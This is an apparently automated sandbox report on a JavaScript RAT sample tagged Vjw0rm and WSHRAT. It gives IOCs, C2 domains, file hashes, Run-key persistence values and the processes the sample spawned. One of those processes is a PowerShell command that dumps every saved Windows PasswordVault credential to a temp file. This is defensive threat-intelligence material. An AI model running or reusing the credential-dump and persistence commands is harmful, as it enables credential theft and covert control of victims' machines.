Malware Analysis Report

2025-01-18 12:21

Sample ID 221109-sp6wxahhc4
Target 879-5160.rar
SHA256 2bcd0ec21bad7f6955cad32f1f5403f07553796d4489feb1a3f3338549e161f0
Tags
vjw0rm wshrat persistence trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2bcd0ec21bad7f6955cad32f1f5403f07553796d4489feb1a3f3338549e161f0

Threat Level: Known bad

The file 879-5160.rar was found to be: Known bad.

Malicious Activity Summary

vjw0rm wshrat persistence trojan worm

Vjw0rm

WSHRAT

Blocklisted process makes network request

Checks computer location settings

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Drops file in Program Files directory

Enumerates physical storage devices

Script User-Agent

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-11-09 15:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-11-09 15:19

Reported

2022-11-09 15:21

Platform

win7-20220901-en

Max time kernel

114s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Java\jre7\food.jar C:\Program Files\Java\jre7\bin\javaw.exe N/A

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js"

C:\Program Files\Java\jre7\bin\javaw.exe

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\food.jar"

C:\Program Files\Java\jre7\bin\java.exe

"C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Program Files\Java\jre7\food.jar"

C:\Program Files\Java\jre7\bin\java.exe

"C:\Program Files\Java\jre7\bin\java.exe" -jar "C:\Users\Admin\food.jar"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 javaautorun.duia.ro udp
US 208.95.112.1:80 ip-api.com tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 8.8.8.8:53 egodds.longmusic.com udp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 8.8.8.8:53 repo1.maven.org udp
US 8.8.8.8:53 github.com udp
US 199.232.192.209:443 repo1.maven.org tcp
US 199.232.192.209:443 repo1.maven.org tcp
US 199.232.192.209:443 repo1.maven.org tcp
US 140.82.112.3:443 github.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp

Files

memory/1380-54-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

memory/936-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js

MD5 4ae28435a346bd27612683e2dd95d23a
SHA1 cf1e5c6550216f15e175576d9229a6ed2bed965f
SHA256 c18232e11968884595a6ca0f2c3c6d43c864d97f3212b99d4eb6b4194a589cfa
SHA512 9d7140675a82e375364f7726f83bc311028644ff2f8f6857b1cf91ec3ea74938ed3a6c0d1c0dc099918d886db0e70c01721c17e5ec0930e9a201d450336df13f

memory/1476-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\food.jar

MD5 3af77cc94136164de04568f4f1aed56c
SHA1 4cbff075ffa329b5b98cf892512f88dcd5804218
SHA256 b751a9ded2c54c5759c1609d497bad0cad7ebd324243bbd45cfbfe435749cede
SHA512 657769932dfb6bde085d0f17aff937bbe556765ac7456060a86010de19dadbc354ea0c7a60de71a348c5618480bd772c3bcbea6c377e5b91260bcccd4cb1f403

memory/1476-67-0x0000000002220000-0x0000000005220000-memory.dmp

memory/1360-71-0x0000000000000000-mapping.dmp

C:\Program Files\Java\jre7\food.jar

MD5 3af77cc94136164de04568f4f1aed56c
SHA1 4cbff075ffa329b5b98cf892512f88dcd5804218
SHA256 b751a9ded2c54c5759c1609d497bad0cad7ebd324243bbd45cfbfe435749cede
SHA512 657769932dfb6bde085d0f17aff937bbe556765ac7456060a86010de19dadbc354ea0c7a60de71a348c5618480bd772c3bcbea6c377e5b91260bcccd4cb1f403

memory/1360-81-0x0000000002260000-0x0000000005260000-memory.dmp

memory/672-84-0x0000000000000000-mapping.dmp

C:\Users\Admin\food.jar

MD5 3af77cc94136164de04568f4f1aed56c
SHA1 4cbff075ffa329b5b98cf892512f88dcd5804218
SHA256 b751a9ded2c54c5759c1609d497bad0cad7ebd324243bbd45cfbfe435749cede
SHA512 657769932dfb6bde085d0f17aff937bbe556765ac7456060a86010de19dadbc354ea0c7a60de71a348c5618480bd772c3bcbea6c377e5b91260bcccd4cb1f403

memory/672-93-0x0000000002310000-0x0000000005310000-memory.dmp

memory/672-98-0x0000000002310000-0x0000000005310000-memory.dmp

memory/1632-99-0x0000000000000000-mapping.dmp

memory/1632-101-0x000007FEF4310000-0x000007FEF4D33000-memory.dmp

memory/1632-103-0x0000000002324000-0x0000000002327000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-11-09 15:19

Reported

2022-11-09 15:22

Platform

win10v2004-20220901-en

Max time kernel

127s

Max time network

154s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBWjfUFDNu.js C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\879-5160.js C:\Windows\system32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\879-5160 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\879-5160.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\symbols\dll\jvm.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\server\symbols\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\dll\ntdll.pdb C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|36F4858E|IYMUGYHL|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 9/11/2022|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4996 wrote to memory of 3124 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 4996 wrote to memory of 3124 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 4996 wrote to memory of 5040 N/A C:\Windows\system32\wscript.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 4996 wrote to memory of 5040 N/A C:\Windows\system32\wscript.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\879-5160.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\food.jar"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll

Network

Country Destination Domain Proto
US 8.8.8.8:53 javaautorun.duia.ro udp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 egodds.longmusic.com udp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 repo1.maven.org udp
US 8.8.8.8:53 github.com udp
US 199.232.192.209:443 repo1.maven.org tcp
US 199.232.192.209:443 repo1.maven.org tcp
US 199.232.192.209:443 repo1.maven.org tcp
US 140.82.114.4:443 github.com tcp
FR 2.18.109.224:443 tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
US 5.62.56.23:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp
JP 172.93.220.135:2048 egodds.longmusic.com tcp

Files

memory/3124-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\VBWjfUFDNu.js

MD5 4ae28435a346bd27612683e2dd95d23a
SHA1 cf1e5c6550216f15e175576d9229a6ed2bed965f
SHA256 c18232e11968884595a6ca0f2c3c6d43c864d97f3212b99d4eb6b4194a589cfa
SHA512 9d7140675a82e375364f7726f83bc311028644ff2f8f6857b1cf91ec3ea74938ed3a6c0d1c0dc099918d886db0e70c01721c17e5ec0930e9a201d450336df13f

memory/5040-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\food.jar

MD5 3af77cc94136164de04568f4f1aed56c
SHA1 4cbff075ffa329b5b98cf892512f88dcd5804218
SHA256 b751a9ded2c54c5759c1609d497bad0cad7ebd324243bbd45cfbfe435749cede
SHA512 657769932dfb6bde085d0f17aff937bbe556765ac7456060a86010de19dadbc354ea0c7a60de71a348c5618480bd772c3bcbea6c377e5b91260bcccd4cb1f403

memory/5040-140-0x0000000003000000-0x0000000004000000-memory.dmp

memory/5040-163-0x0000000003000000-0x0000000004000000-memory.dmp

memory/5040-165-0x0000000003000000-0x0000000004000000-memory.dmp

memory/5040-166-0x0000000003000000-0x0000000004000000-memory.dmp

memory/816-167-0x0000000000000000-mapping.dmp

memory/816-168-0x000001A8F79F0000-0x000001A8F7A12000-memory.dmp

memory/816-169-0x000001A8F7B40000-0x000001A8F7B4A000-memory.dmp

memory/816-170-0x00007FFAB5CE0000-0x00007FFAB67A1000-memory.dmp

memory/816-171-0x000001A8F7BB0000-0x000001A8F7BB8000-memory.dmp

memory/816-172-0x00007FFAB5CE0000-0x00007FFAB67A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 c416c12d1b2b1da8c8655e393b544362
SHA1 fb1a43cd8e1c556c2d25f361f42a21293c29e447
SHA256 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046
SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

memory/1672-174-0x0000000000000000-mapping.dmp

memory/2240-175-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Local\Temp\wshsdk\vcruntime140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Local\Temp\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

C:\Users\Admin\AppData\Local\Temp\wshsdk\VCRUNTIME140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Local\Temp\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc

MD5 e3f691d123a890f18538f5fead7bd6cd
SHA1 f6e77a0008cefa3a7e3f67c7d11c7787391db5d9
SHA256 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934
SHA512 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23

C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__init__.py

MD5 82afd9dcb28c19afdc42097fcbdbe662
SHA1 329e052afe981c8ba32ff78df2deb9d041c05f8b
SHA256 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e
SHA512 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897

C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\codecs.py

MD5 d1d8d96ee5398cda53cbddca69b8e2ab
SHA1 3998c0a2124ab260a7d83f296228be90418b8366
SHA256 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3
SHA512 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b